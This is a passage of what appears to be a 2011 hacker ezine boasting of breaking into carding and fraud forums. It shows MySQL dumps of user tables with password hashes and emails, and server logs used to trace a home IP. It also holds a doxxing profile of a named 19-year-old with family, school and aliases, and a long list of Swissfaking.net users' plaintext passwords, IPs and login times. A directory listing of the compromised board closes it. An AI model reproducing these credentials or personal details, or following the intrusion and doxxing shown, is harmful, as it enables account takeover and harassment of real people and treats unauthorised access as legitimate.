onlineschauen_bi | | onlineschauen_ho | | onlineschauen_ma | | onlineschauen_on | | onlineschauen_se | | pavlrse_xshop | | propiska_gr | | propiska_us | | propiska_work | | scenehack_board | | snetwork_4g741 | | snetwork_sh24op | | szenevz_123 | | szenevz_db | | test | | test4me_db | | thefuelru_pp | | useresu1_prava | | useresu_bollist | | vsocks_vsocks69 | | vsocks_vsocks69_ | | vsocks_vsocks69_a | +--------------------+ 48 rows in set (0.00 sec) mysql> USE ganymedes_bosscc; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql> SHOW TABLES; +----------------------------+ | Tables_in_ganymedes_bosscc | +----------------------------+ | admin_navi | | navi_de | | news | | produkt_gruppen | | produkt_items | | produkte | | psc | | support | | supporter | | supporter_group | | ukash | | users | +----------------------------+ 12 rows in set (0.00 sec) mysql> SELECT count(*), sum(guthaben) FROM psc; +----------+---------------+ | count(*) | sum(guthaben) | +----------+---------------+ | 74 | 1080 | +----------+---------------+ 1 row in set (0.00 sec) mysql> # Not bad ... mysql> SELECT count(*) FROM users; +----------+ | count(*) | +----------+ | 1359 | +----------+ 1 row in set (0.00 sec) mysql> SELECT * FROM users WHERE guthaben > 1; +------+----------+------------------------------------+----------------------+-----------+----------+--------+ | id | username | pass | email | reason | guthaben | access | +------+----------+------------------------------------+----------------------+-----------+----------+--------+ | 1 | blamedyy | ==44c8cf514440543c728bee1864a1a466 | blamedyy@yahoo.com | | 897 | 1 | | 474 | hung2304 | ==2864d82ad1e49fffcafe85976c602868 | jidar@hotmail.de | faked psc | 8 | 33 | | 485 | SlamD | ==65259faf801899cfd1f27b389b8849ac | arx2@gmx.net | | 3 | 0 | | 555 | AEQUITAS | ==ee61e9fd8caafb735406838f18235281 | aequitas@z1p.biz | | 3 | 0 | | 618 | Jettic | ==a1eba8157beb255a503e8b586e141b61 | jettic@mail.ru | | 3 | 0 | | 634 | me2 | ==cfbf7976666e981d217cfed255d7db6e | fff8756@yahoo.de | | 3 | 0 | | 640 | riddick | ==24217c603630ce2339503db1d009b8c7 | riddicker1@web.de | | 3 | 0 | | 817 | Hilli | ==8e6a108a6555e604f9f652d679c7ab29 | shiva166@web.de | | 2 | 0 | | 865 | killersm | ==6b8daaab17c40f5fbf9aab0db8dc21bf | jhir@jire.de | | 3 | 0 | | 875 | skilled | ==195b9d5a1e7d2ef7237eb467533ec1f2 | sk@sk.com | | 3 | 0 | | 943 | FatJoe | ==ed35e0bc4b6a22cd24f74e039533276f | sedaephi@emailgo.de | | 2 | 0 | | 963 | Bogner | ==b3a0ad39806aced9241a80b9a11868e4 | placebo84@hotmail.de | | 3 | 0 | | 971 | keks | ==572330601360f7945006cae2ea549bab | aggroberliner222@web | | 3 | 0 | | 975 | saidone | ==aba11e56813d842283854c6ccccbef60 | saytec@gmx.de | | 3 | 0 | | 1022 | lczero | ==37d1475d60b2c99b1c222a5a5acc2c58 | sdpfmodpmgg@web.de | | 3 | 0 | | 1094 | peterpan | ==fdc6b6d13338d1b9f1099dcec97cb2a8 | tfmpp1@web.de | | 3 | 0 | | 1261 | Tommy | ==7d01922eeaeb9682953c49fd20ece458 | tomdanger@rbcmail.ru | | 3 | 0 | | 1443 | 2345176 | ==9ddfac889552a0cdf635e46c8c70b01b | b2121870@prtnx.com | | 3 | 0 | | 1466 | badboy44 | ==3fa46350e1a9aa6f09a32cb342eb8c31 | anja_ludi@web.de | | 3 | 0 | | 1484 | delphin | ==7b8d81c371ada9fd93a448c7ac45b346 | asdgasd@asdga.de | | 3 | 0 | | 1494 | booom | ==ee6c8e07eed464a4842c2335b4977309 | jhghj@gggh.de | | 3 | 0 | | 1512 | tetrispr | ==1e63fa4217770660acccbcf4acabfc67 | tatakiru@gmx.de | | 3 | 0 | | 1513 | stage6 | ==660d11767f02a3a7403bfe47954de520 | carders@hotmail.de | | 3 | 0 | | 1586 | m1sc | ==1d28ce4b9ff02e4a08432036f7316db1 | m1sc@gmx.de | | 3 | 0 | | 1619 | anubis | ==dda9ab9768f7367198227e69b83cedbd | xAnuBiSx@gmx.de | | 3 | 0 | | 1671 | carlos | ==2a363b531b95578a7d816dd02cde60d6 | carlos---@live.de | | 3 | 0 | | 1715 | advanced | ==924f32ec3a868e5555ee1910d4242ce1 | advanced@gnx.de | | 3 | 0 | | 1719 | Blizzard | ==74281aac5624b24fb3472feab558a5d1 | kgadkhagj@spambob.de | | 2 | 0 | | 1735 | ripit | ==eed34671e873f2aa07d30d878f182ce0 | ripit@mailinator.com | | 3 | 0 | +------+----------+------------------------------------+----------------------+-----------+----------+--------+ 29 rows in set (0.00 sec) mysql> Aborted There we got one of Ganymedes' other accountnames and his email: blamedyy@yahoo.com. We better check out some proftpd logs. Ganymedes constantly used proxies, but there is one login sequence where he did not: # grep 93.232.*ganymedes proftpd-transfer.log Mon Jan 24 15:34:21 2011 0 212.117.174.26 0 /home/ganymedes/el-basar.biz/85c91o822x3olps1d8179xizbm27/check/vp2q910pxc2ifo091y/6337180258293023293 a _ d r ganymedes ftp 0 * c Mon Feb 07 02:04:40 2011 0 93.232.193.137 2416 /home/ganymedes/el-basar.biz/designe/design/navi.php a _ o r ganymedes ftp 0 * c Mon Feb 07 02:04:45 2011 0 93.232.193.137 1709 /home/ganymedes/el-basar.biz/designe/design/title_gh.php a _ o r ganymedes ftp 0 * c Mon Feb 07 02:09:23 2011 0 93.232.193.137 1917 /home/ganymedes/el-basar.biz/co2xcpqwlvxmi/config.php a _ o r ganymedes ftp 0 * c Deutsche Telekom AG, NRW, Germany. Well done kid. ,;~;, _/\ \ ) (\\ ()) /';;,, // | -------==={ The Happy Ninja Faker }===))))))))))))))=m( )_ __ | ,(.' '~/()' ' '\ Some of you guys might have noticed that a ~ | ||( );, "HappyNinjas" Twitter account has been created ( ,;.)-\ / ';, on the 4th or 5th February 2011 which seemed \ ( \ ( to offer the opportunity to receive the latest || \\ news regarding our actions. As we observed this /_( /_( account got some attention and even obtained nearly 100 followers. Hurray. However it isn't ours :( To get more publicity the creator also published a fake zine called exp04.txt at http://www.pva-apeldoorn.nl/exp04/exp04.txt. It was very clear that the person didn't do this to help us or fight the fraudscene, but to spread lies. So we did the only logical thing: We hacked that server too, removed the fake and copied some logs. Here are some excerpts: 2011-02-10 16:19:24 W3SVC4579 SOHOSTED07 195.8.208.38 GET /exp04 - 80 - 91.211.117.25 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.1;+de;+rv:1.9.2.13)+Gecko/20101203+Firefox/3.6.13 - - 301 0 0 370 399 500 2011-02-10 16:19:26 W3SVC4579 SOHOSTED07 195.8.208.38 GET /exp04/index.html - 80 - 91.211.117.25 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.1;+de;+rv:1.9.2.13)+Gecko/20101203+Firefox/3.6 .13 - - 200 0 0 316 400 687 2011-02-10 16:58:53 W3SVC4579 SOHOSTED07 195.8.208.38 GET /exp04/exp04.txt - 80 - 91.211.117.25 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.1;+de;+rv:1.9.2.13)+Gecko/20101203+Firefox/3.6. 13 - http://twitter.com/ 304 0 0 236 527 296 Whups, looks like someone did a messy job there. Well, at least he used a proxy. But after some black magic we also hacked the proxy and it showed us the right way to payback. So who did this lousy job, you may ask? Noone else but 3lite aka InVisible, (former) moderator and admin of several fraud orientated message boards. It wasn't hard to find more information about him, right Robin? To understand why someone would do such things we first have to understand who he is. Robin is 19 years old and comes from a typical middle class family. Both parents are employed, the father as an administrative official, the mother as an industrial clerk. He also has three sibs. His family consists of baptists (a crazy sect, calm but annoying), thus it is not really surprising that his mother also spends way too much money on esoteric medicine. I guess if you can believe in the biblical history of creation you can believe in anything. His education started at the grammar school (Gymnasium) in 2002. After two wasted years he switched to middle school (Realschule). Three years later he had to switch again, this time to secondary modern school (Hauptschule). The story of his life. This year he finished technical college (Berufsfachschule) with a rather bad grade. In his virtual life he mostly works with botsoftware, infects people and sells the stolen data to other fraudsters. In other words: he is a trojan skiddy. Sounds like a bored, unmotivated child without much talent and that is exactly what he is. He used more than ten different nicknames in the past, because after a while they all had a very bad reputation. And that are only the names we know about, there are probably more. _ _____________________ _ | | | | |b| Deoxys |b| |o| Aerodactyl |o| , |x| Raid0n17 |x| (@| | | DeoOxygen | | ,, ,)|_____|o| ExplosiV / ExplOsiv |o|_______ //\\8@8@8@8@8@8 / _ _ |f| Androx |f| _ _ _ \ \\//8@8@8@8@8@8 \_____| | 3lite / 3lite2k11 | |_______/ `` `)| |s| Raiden |s| (@| |h| »InVisible |h| |a| R@ven |a| |m| Fr33w4re |m| |e| VexX |e| |_|_____________________|_| If you want to check him out yourself, here are some links. More information can be found in the attached files. http://www.youtube.com/Raid0n17 http://www.youtube.com/DeoOxygen http://aerodactyl.wordpress.com/ http://steamcommunity.com/profiles/76561197968670011 He loves to use variations of "1337" and "troll" as his passwords. Very secure, you should give it a try. Our conclusion: This guy is really fucked up. He is a pathological liar, a deadbeat, a scammer. Avoid him if you can. Side note: The following two texts have already been published by us, because the given circumstances forced us to in that time. Since both texts have not made it into an "official" ezine yet, we decided to print them here. Have fun! ,;~;, /\_ ( / (() //) | \\ ,,;;'\ __ _( )m=((((((((((((((======={ Swissfaking.net }=====------- /' ' '()/~' '.(, | ,;( )|| | ~ Swissfaking.net has not been in the center of ,;' \ /-(.;, ) our interest for long, mainly because one doesn't ) / ) / hear a lot about it. From the outside they just // || seem to be a small board, not any worse than )_\ )_\ the average kiddyforums. However, when looking at it closely, one notices that swissfaking manages to fully compensate for their size with the most shrewd users. These peoples' only interest seems to make money. Lots. Fast. No matter what. Swissfaking consider themselves a very special community; that's why the registration has been closed since 2009 and replaced by an invite system. Under these circumstances one would not expect great activity in the forums, though as we first logged in, we were bombarded with piles of blinking flash ads. The most ridiculous one was probably that of some fag selling credit cards. ____________________________________________________________________ | __ __ | | .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | | | _ | | | _ || _| -__|| _ | _ |_ _| | | |__ |_____|_____||____|_____||_____|_____|__.__| | |________|__|________________________________________________________| | | | d3adline: | | You want buy without any risks? You want fast car? You want hot | | girls? You want have glamorous partys? Then buy ccs from d3adline | |____________________________________________________________________| This again shows pretty well how ignorant those fucks are; as if a credit card brought you from mom's basement to high life. Just because the majority of swissfaking's users probably suffer from the same mental disease as the mister quoted above, we have prepared a treatment, but wait, before we start, here are Username:plain password:IP:logintime of almost all users: p5n:@Copy10cv:91.89.69.182:January 2, 2011, 9:24 pm mcdrive:belinea:188.23.69.210:January 2, 2011, 11:19 pm n3ro:LbiI:{mq>K kZäj`,}} :213.232.200.177:January 3, 2011, 7:30 pm pandora:nokia6280:84.61.88.65:January 2, 2011, 10:36 pm fenriz187:gelomyrtol:92.225.202.186:January 6, 2011, 8:09 pm tezeewood:26nu4uku26nu4uku$:109.91.113.26:January 2, 2011, 9:16 pm china:§k$vf@n1:81.210.136.47:January 2, 2011, 11:54 pm ibrains:qw2io0pl:46.115.102.70:January 2, 2011, 9:29 pm rox:rox24255:80.122.42.30:January 3, 2011, 11:45 pm slash:keinproblem15:83.135.112.150:January 3, 2011, 1:21 am punisher:youtube26:85.180.135.133:January 2, 2011, 11:27 pm lolboter:EsPZLtQa2x=9Mf@I:80.171.11.252:January 5, 2011, 11:55 pm fasti1001:lasterraster:77.20.136.173:January 4, 2011, 11:22 am d0pz:lollollol123miregal95:213.163.64.43:January 2, 2011, 11:48 pm tolja:fujitsusiemens22:91.61.147.49:January 2, 2011, 11:55 pm solt:lolgolol:95.143.192.159:January 2, 2011, 9:09 pm beex:ab1cd2:91.89.190.46:January 2, 2011, 9:56 pm pimperich:M1YgRgXB:79.228.118.129:January 3, 2011, 10:28 am curly:Eminem:79.193.89.45:January 2, 2011, 10:10 pm jasmin75:yId69xqsmBve:87.150.137.16:January 2, 2011, 9:29 pm justmike:t3xxe33:84.168.231.191:January 2, 2011, 10:10 pm du3en:kjxxdj13:92.73.69.139:January 2, 2011, 11:00 pm dr.bob:Swissfaking2011:84.61.238.224:January 2, 2011, 10:13 pm prototype:matrix:46.126.244.198:January 3, 2011, 2:13 am winkelmann72:jonaskiessling:89.208.35.190:January 2, 2011, 10:03 pm tollik:audi80:93.205.10.77:January 2, 2011, 9:43 pm cybi0nic:67k57eiSswissfaking:93.182.171.109:January 3, 2011, 4:10 pm wuschi:fetterJaxel:82.83.42.21:January 3, 2011, 8:26 am juan:55555:217.23.6.162:January 3, 2011, 6:24 pm fusselpo:schatz11:77.22.240.27:January 4, 2011, 10:00 pm nomercy:ymZZIFIF0nCZZ$BW:62.143.126.35:January 2, 2011, 9:26 pm jamyla:2wsx6zhn:93.217.241.134:January 6, 2011, 5:33 pm nemiz:2z3545:94.220.79.39:January 4, 2011, 11:47 pm theird21:kmk00025879:217.88.114.20:January 2, 2011, 11:11 pm corvu5:corvu54swissfaking:95.222.116.238:January 2, 2011, 10:13 pm s0xtech:s0xy0000:217.231.252.159:January 2, 2011, 9:39 pm speedygamer:Nzhdtlcwb1:89.149.242.16:January 3, 2011, 12:39 am die-wiese:Ventura83:188.193.8.225:January 3, 2011, 12:47 pm goldrock:56&6ght$$!awwEfb:62.167.138.232:January 2, 2011, 10:48 pm devilboy:pelubo62:87.106.94.167:January 4, 2011, 3:04 pm fam0us:ichliebedich1:92.241.168.24:January 2, 2011, 10:49 pm ares:mmmmmmmmm:80.108.172.227:January 5, 2011, 9:48 pm imer:misakifan:93.217.127.220:January 2, 2011, 9:48 pm secdaking:$p!tT3r2k!0:79.211.101.154:January 3, 2011, 12:36 am seriousman:regen@44:79.203.222.236:January 2, 2011, 11:08 pm mpcool:famous:77.183.227.158:January 3, 2011, 5:13 pm sine:ninaninabekim:79.197.201.62:January 2, 2011, 10:14 pm famous:aLq3lm$%:92.241.190.253:January 2, 2011, 10:29 pm psych0:achtzehn32:79.204.163.237:January 3, 2011, 3:41 pm trickz:crazyfrog1234:87.118.118.37:January 2, 2011, 9:27 pm pseudo:hackedbypseudo:78.48.103.103:January 2, 2011, 9:45 pm n00be:kjvhjvhjhvmvh:92.241.190.253:January 2, 2011, 10:11 pm txto:123456:88.67.188.148:January 3, 2011, 2:17 am mehmet111:hahaka:66.90.73.223:January 3, 2011, 4:28 am daemon:weed1337:84.149.94.90:January 3, 2011, 6:45 pm sugar:xip6hexi0:217.91.210.243:January 4, 2011, 9:12 am dextrose:.l33rlauf:92.241.168.90:January 2, 2011, 11:04 pm weareone:Ichwurdeam23.07.1994geboren.:212.117.174.26:January 2, 2011, 9:49 pm fatalerror:pulamea18:88.117.121.105:January 4, 2011, 2:39 pm devolo:PT1346798522!:93.130.53.175:January 2, 2011, 10:14 pm lestat:123456:79.236.62.169:January 3, 2011, 4:30 pm zahlenpilz:hacksector:92.77.4.189:January 3, 2011, 9:33 pm ivenom:1337s!lenTxD:87.143.216.239:January 2, 2011, 9:45 pm stegen:daniel:188.194.83.146:January 6, 2011, 4:54 pm ch4in:1384gwm123:217.187.138.90:January 3, 2011, 12:14 am hesgoodboy:01724186115:217.114.211.242:January 3, 2011, 1:30 pm michi:äöüäöü:91.42.237.242:January 2, 2011, 9:14 pm lazarus:Google123:85.178.160.144:January 2, 2011, 9:30 pm paran0id:bravsobrav:212.117.160.22:January 2, 2011, 9:01 pm simul4nt:comnoboat:109.192.198.159:January 3, 2011, 12:23 am dicethrower:12wue345rfe6l:212.23.103.26:January 3, 2011, 2:35 pm raydo:h3llboy:93.208.239.102:January 4, 2011, 12:04 am janus:vladimir:92.107.113.49:January 2, 2011, 10:49 pm crankrex:monohydrat:95.89.188.29:January 3, 2011, 7:17 pm paradox:BTYM8h:92.241.168.90:January 2, 2011, 9:25 pm bluehero:1qay2wsx:84.138.178.123:January 2, 2011, 11:50 pm nobody:pagewrapper:83.170.114.16:January 6, 2011, 12:06 am freakout:Ghana11:178.200.60.53:January 4, 2011, 10:35 pm loop:1337loopi:78.48.162.155:January 4, 2011, 9:44 am phr34kz:UX3eXfSzZ5q7N0{:212.117.162.222:January 2, 2011, 9:19 pm hoodstar:lieblingssarah271994:78.50.94.114:January 4, 2011, 12:45 am alphahack:alphahack:188.108.81.215:January 3, 2011, 11:59 pm silence:8530ch:91.65.94.151:January 2, 2011, 9:16 pm christian:123456:78.42.172.154:January 2, 2011, 10:05 pm batonde:gDHoCJHG-6*Ae1Lj:88.73.87.81:January 6, 2011, 7:38 pm jokereloaded:stefan1337!:217.225.87.229:January 3, 2011, 11:22 am oneone1:BVBBERKY212:91.33.186.9:January 3, 2011, 3:34 pm vodka:159ZAYCXS792QUALIAdRO//:217.255.207.169:January 2, 2011, 9:25 pm killermouse:kiffer:78.55.117.164:January 3, 2011, 11:26 pm run.:duschlampen!1:79.194.93.91:January 3, 2011, 9:45 pm 1337_reaction:1002003000:92.241.165.69:January 2, 2011, 9:55 pm king6545:Soh2vebo333:178.203.138.49:January 4, 2011, 11:31 pm basics:nicki123!:91.67.60.117:January 2, 2011, 9:03 pm deco:julian08:178.202.239.33:January 2, 2011, 9:38 pm ricardiazz:swissfaking:89.13.14.5:January 2, 2011, 9:16 pm delax:hackerfun:188.193.194.86:January 2, 2011, 9:11 pm jamesfb:fenerbahce:94.221.91.129:January 2, 2011, 10:43 pm icebox87:apfel23:79.253.148.110:January 3, 2011, 1:50 pm tryit:187lalalala187#:88.70.196.173:January 2, 2011, 11:46 pm mrk:422mark646:62.178.8.56:January 3, 2011, 12:43 am peter_pan:2bon2b:62.143.149.223:January 6, 2011, 9:33 am tweaknap:%$HD1337PS$%:178.142.84.178:January 3, 2011, 12:11 am nokz:aufleg0rn:92.227.68.28:January 3, 2011, 8:33 am shoxx:g07091992:92.74.162.228:January 3, 2011, 4:34 pm edgeee:za32qt4s.:80.201.55.194:January 3, 2011, 2:15 pm w.t.f.:lol123:217.226.243.83:January 3, 2011, 11:06 pm d3rd0n:12cocsli:93.217.26.178:January 3, 2011, 2:52 am sp33djunkie:17331733:212.117.162.222:January 2, 2011, 9:24 pm infomailer:9ö7&4k.ü_ä VmSH.NmwD:77.23.8.178:January 2, 2011, 10:01 pm nesia:Nummer13Lebt!!!:82.82.167.173:January 4, 2011, 11:13 am nyuu:123456789:87.122.143.30:January 2, 2011, 10:03 pm selix:Bitrate187:188.192.238.47:January 3, 2011, 12:09 pm smithz:Sarah1988:92.241.190.253:January 3, 2011, 1:40 am ryl666:lolomg123:83.216.241.77:January 2, 2011, 10:20 pm boardmaster2010:16052009:78.55.59.70:January 3, 2011, 9:06 pm siverman:276910:77.187.55.123:January 3, 2011, 2:03 pm deathnote:Shinigami1:91.113.13.4:January 3, 2011, 5:19 pm ghostt:qawsed:95.128.242.224:January 6, 2011, 3:11 am kingmail:1qay2wsx3edc4rfv:79.209.8.113:January 3, 2011, 2:40 pm xxlegendaxx:123234:89.217.150.18:January 3, 2011, 11:25 am ndtbit:ndtbit7:80.146.17.64:January 3, 2011, 1:33 am anno:valerka:90.136.45.75:January 4, 2011, 8:04 pm garrisson:hallo123:92.106.62.29:January 3, 2011, 12:45 pm spitfir3:012345:93.232.245.248:January 6, 2011, 12:41 pm z0mg:hitler123456:77.23.89.32:January 3, 2011, 4:18 am prisma:dasydasy15:87.166.73.53:January 3, 2011, 11:31 pm itunes:edu123hil:24.170.79.116:January 3, 2011, 10:55 pm leopard:teufeline<3swiss:213.163.64.43:January 2, 2011, 9:35 pm m00n:berlin123:188.193.230.70:January 2, 2011, 9:51 pm danemone:danemonekoklopspocicdvbt:92.241.168.24:January 4, 2011, 2:39 am rolf32:fickmich069:213.163.65.50:January 2, 2011, 10:49 pm accoli:hallo123:80.80.246.188:January 4, 2011, 11:23 am st0re:123456:109.193.140.236:January 3, 2011, 4:22 pm wrigleys:schwippschwapp999:93.192.161.49:January 2, 2011, 9:28 pm jigga666:159951baumheide123:109.90.93.220:January 2, 2011, 11:42 pm sar:6%$45De§$wER:92.231.164.131:January 3, 2011, 12:40 am deffjeff:30111970:94.219.18.179:January 4, 2011, 1:48 pm playa_:1abc23z1:217.248.142.13:January 2, 2011, 9:54 pm cy0n!x:55de!xz7:178.3.205.85:January 4, 2011, 4:31 pm mc_wrei:fiona2:84.75.38.254:January 3, 2011, 8:49 pm br0unce:!$spainyswiss$:85.214.39.134:January 2, 2011, 9:00 pm saxas:6bhy&#nVKenahwLU7oj6WzD&JA%ZnT:89.217.182.32:January 2, 2011, 9:35 pm peevee:aimer89:78.50.91.135:January 3, 2011, 2:45 am mark21:wiesonicht:217.248.156.69:January 3, 2011, 12:22 am keks:Rof1rwe88$:178.1.51.57:January 3, 2011, 1:52 pm cyborgx:dihodo62:91.50.105.196:January 3, 2011, 2:15 am tomdanger:gogogo123:92.241.168.24:January 2, 2011, 9:34 pm logg23:koruku11:91.48.156.95:January 2, 2011, 9:35 pm inferior:210340:91.113.110.183:January 4, 2011, 2:56 pm djinn:m28h611!:109.90.88.103:January 3, 2011, 8:05 pm fred777:swissfaking.6x.toto:91.17.194.74:January 3, 2011, 1:22 am w00dka:technobase1337:91.7.224.30:January 2, 2011, 10:51 pm achmatov:hansdieter1:87.148.16.206:January 2, 2011, 11:51 pm acidraining:$@cidr@ining$:95.208.135.191:January 3, 2011, 12:56 am h0us3:josiaistschwarz:85.25.184.102:January 2, 2011, 9:10 pm franky:Franky12345678909*:212.117.172.231:January 2, 2011, 9:16 pm blueye:gnomi1337:202.60.66.32:January 3, 2011, 5:04 pm chillerdady:K@t0LiDoR:87.181.209.28:January 3, 2011, 12:28 am flash:nx6200ax:217.94.255.158:January 2, 2011, 11:59 pm kuku:kuhfrosch123:79.242.127.235:January 3, 2011, 5:45 pm mr.ru:kaik88ka:92.241.165.69:January 4, 2011, 1:56 am n!sk:madonna119:95.143.192.190:January 2, 2011, 10:31 pm kk3kk:Soundzz12:78.54.51.234:January 3, 2011, 3:07 am raupi419:klISDMoVPNycc6zYnvLw3CaG:46.126.220.35:January 2, 2011, 9:31 pm binary:sänger44:178.238.142.242:January 2, 2011, 11:41 pm blu3cod3:lj49:93.220.25.103:January 5, 2011, 1:04 pm armizor:qwerdxyas1234:91.48.104.120:January 3, 2011, 5:06 pm zerox:Einfach-111:79.229.219.110:January 2, 2011, 10:36 pm n0ise:Malle09*geil!!:212.117.165.197:January 3, 2011, 12:53 am hard$tyler:martin55:92.241.190.253:January 6, 2011, 1:03 pm ezel:enbüyükallah:85.177.167.57:January 2, 2011, 10:01 pm spacejovi:Sara06.10:81.173.147.225:January 2, 2011, 9:25 pm kingsize89:lesane25121989:78.42.183.79:January 2, 2011, 11:12 pm sushi:SmokingGras:79.197.71.162:January 5, 2011, 11:05 pm joe:12345asd:213.163.65.50:January 5, 2011, 4:08 pm syntex:knallfrosch221:93.212.172.91:January 4, 2011, 10:55 am afroman:JGMlms91:94.220.85.64:January 3, 2011, 4:27 am master2k:5e4d3c2b1a:212.117.165.197:January 3, 2011, 12:07 pm inex:coldmaster1337:93.82.245.122:January 5, 2011, 3:40 pm smile:saufen123456:89.204.137.180:January 2, 2011, 11:05 pm cch:anit77:93.232.245.48:January 6, 2011, 12:38 am ziiieper:Computermausi21:188.100.191.130:January 2, 2011, 9:01 pm moses908:161286:178.142.75.51:January 3, 2011, 3:17 am sensemann88:10051964:79.248.91.90:January 6, 2011, 3:52 pm eddy:aspirine:92.203.35.1:January 4, 2011, 5:54 pm kugelblitz:WaBaXLx1:93.212.129.172:January 3, 2011, 8:20 pm jamesdean:1qwerbeet:93.217.25.62:January 3, 2011, 4:32 pm m0nic:IbebLadJ1993 #!:87.118.120.182:January 2, 2011, 9:24 pm insame:crunk1994:88.67.124.238:January 2, 2011, 9:07 pm psychoink:l*8R&t3CpgW6rw5z5H:82.82.217.166:January 3, 2011, 1:18 pm jaroslav:ramona6305600:87.189.172.31:January 2, 2011, 9:20 pm reto:dragon11:77.194.252.92:January 4, 2011, 4:20 pm xerox:D#fqh88jb:89.182.159.187:January 2, 2011, 11:09 pm gamerfis:$&%?ZJ94:85.176.78.21:January 2, 2011, 11:14 pm nko:password:nox:87.173.185.216:January 3, 2011, 12:31 pm yaboybigt:=-_})-=0:81.210.167.79:January 3, 2011, 5:11 am bonx:bubu1818:89.204.153.167:January 4, 2011, 1:54 pm dogma:walkthelineswiss:92.106.249.125:January 3, 2011, 1:24 am ratzi:lusenheide:109.91.140.55:January 7, 2011, 12:33 am 3p!cf4!l:tele2sux:92.241.165.69:January 5, 2011, 2:55 pm nagilum:gilgamesch1415926535:84.19.169.234:January 2, 2011, 9:28 pm 3dr:leeroyjenkins:84.59.162.27:January 2, 2011, 11:22 pm erazorx8:ficken:92.225.129.75:January 4, 2011, 6:32 pm mopedfahrer:mozilla006:84.19.169.162:January 5, 2011, 10:46 pm darookie:Pr0d1gyThe:87.159.47.180:January 3, 2011, 12:08 am paranoid:crbahP962P:91.66.225.130:January 3, 2011, 6:10 pm devil234:R/m<7ctN&AEr require valid-user 1:$1$VuIT5qnw$SD8.UzvKgXUwoufPSiaR/. # cd board && ls -la total 2416 drwxr-xr-x 23 swissfaking swissfaking 4096 Jan 4 22:30 . drwxr-xr-x 6 swissfaking swissfaking 4096 Dec 31 18:47 .. -rw-r--r-- 1 swissfaking swissfaking 238 Oct 24 13:33 .htaccess22foo -rw-r--r-- 1 swissfaking swissfaking 39 Oct 24 13:33 .htpasswd -rw-r--r-- 1 swissfaking swissfaking 23823 Mar 26 2010 ajax.php -rw-r--r-- 1 swissfaking swissfaking 75490 Mar 26 2010 album.php -rw-r--r-- 1 swissfaking swissfaking 17119 Mar 26 2010 announcement.php drwxr-xr-x 2 swissfaking swissfaking 4096 Mar 26 2010 archive -rw-r--r-- 1 swissfaking swissfaking 18288 Mar 26 2010 attachment.php -rw-r--r-- 1 swissfaking swissfaking 35093 Apr 14 2010 banned.jpg drwxr-xr-x 2 swissfaking swissfaking 4096 Nov 17 21:25 banners -rw-r--r-- 1 swissfaking swissfaking 75309 Mar 26 2010 calendar.php -rw-r--r-- 1 swissfaking swissfaking 43 Mar 26 2010 clear.gif drwxr-xr-x 5 swissfaking swissfaking 4096 Jan 2 16:30 clientscript -rw-r--r-- 1 swissfaking swissfaking 15346 Mar 26 2010 converse.php -rw-r--r-- 1 swissfaking swissfaking 555 Oct 24 13:33 cookie.html drwxr-xr-x 8 swissfaking swissfaking 4096 May 7 2010 cpstyles -rw-r--r-- 1 swissfaking swissfaking 49309 May 19 2010 credits.php -rw-r--r-- 1 swissfaking swissfaking 3299 Mar 26 2010 cron.php drwxr-xr-x 3 swissfaking swissfaking 4096 Mar 26 2010 customavatars drwxr-xr-x 3 swissfaking swissfaking 4096 Mar 26 2010 customgroupicons drwxr-xr-x 2 swissfaking swissfaking 4096 Mar 26 2010 customprofilepics -rw-r--r-- 1 swissfaking swissfaking 47736 Mar 26 2010 editpost.php -rw-r--r-- 1 swissfaking swissfaking 29479 Mar 26 2010 external.php drwxr-xr-x 2 swissfaking swissfaking 4096 Jan 4 22:35 falloutadm -rw-r--r-- 1 swissfaking swissfaking 9765 Mar 26 2010 faq2.phpoldold -rw-r--r-- 1 swissfaking swissfaking 4286 Mar 26 2010 favicon.gif -rw-r--r-- 1 swissfaking swissfaking 35640 Mar 26 2010 forumdisplay.php -rw-r--r-- 1 swissfaking swissfaking 39820 Mar 26 2010 global.php -rw-r--r-- 1 swissfaking swissfaking 137864 Mar 26 2010 group.php -rw-r--r-- 1 swissfaking swissfaking 24898 Mar 26 2010 group_inlinemod.php -rw-r--r-- 1 swissfaking swissfaking 10816 Mar 26 2010 groupsubscription.php -rw-r--r-- 1 swissfaking swissfaking 9026 Mar 26 2010 image.php drwxr-xr-x 21 swissfaking swissfaking 4096 Oct 31 22:09 images drwxr-xr-x 2 swissfaking swissfaking 4096 Apr 9 2010 img drwxr-xr-x 7 swissfaking swissfaking 12288 Jan 2 22:12 includes -rw-r--r-- 1 swissfaking swissfaking 19575 Nov 27 04:26 index.php drwxr-xr-x 6 swissfaking swissfaking 4096 Mar 26 2010 infernoshout -rw-r--r-- 1 swissfaking swissfaking 11083 Mar 26 2010 infernoshout.php -rw-r--r-- 1 swissfaking swissfaking 43808 Mar 26 2010 infraction.php -rw-r--r-- 1 swissfaking swissfaking 182738 Mar 26 2010 inlinemod.php -rw-r--r-- 1 swissfaking swissfaking 5850 Mar 26 2010 itrader.php -rw-r--r-- 1 swissfaking swissfaking 11784 Mar 26 2010 itrader_detail.php -rw-r--r-- 1 swissfaking swissfaking 11841 Mar 26 2010 itrader_feedback.php -rw-r--r-- 1 swissfaking swissfaking 1401 Mar 26 2010 itrader_global.php -rw-r--r-- 1 swissfaking swissfaking 19557 Mar 26 2010 itrader_main.php -rw-r--r-- 1 swissfaking swissfaking 3570 Mar 26 2010 itrader_report.php drwxr-xr-x 2 swissfaking swissfaking 4096 Oct 10 19:11 jabber -rw-r--r-- 1 swissfaking swissfaking 10321 Mar 26 2010 joinrequests.php -rw-r--r-- 1 swissfaking swissfaking 10201 Mar 26 2010 login.php -rw-r--r-- 1 swissfaking swissfaking 17048 Mar 26 2010 member.php -rw-r--r-- 1 swissfaking swissfaking 15910 Mar 26 2010 member_inlinemod.php -rw-r--r-- 1 swissfaking swissfaking 35880 Mar 26 2010 memberlist.php -rw-r--r-- 1 swissfaking swissfaking 23846 Mar 26 2010 misc.php -rw-r--r-- 1 swissfaking swissfaking 63310 Mar 26 2010 moderation.php -rw-r--r-- 1 swissfaking swissfaking 6735 Mar 26 2010 moderator.php -rw-r--r-- 1 swissfaking swissfaking 18456 Mar 26 2010 newattachment.php -rw-r--r-- 1 swissfaking swissfaking 37083 Mar 26 2010 newreply.php -rw-r--r-- 1 swissfaking swissfaking 18890 Mar 26 2010 newthread.php -rw-r--r-- 1 swissfaking swissfaking 19583 Mar 26 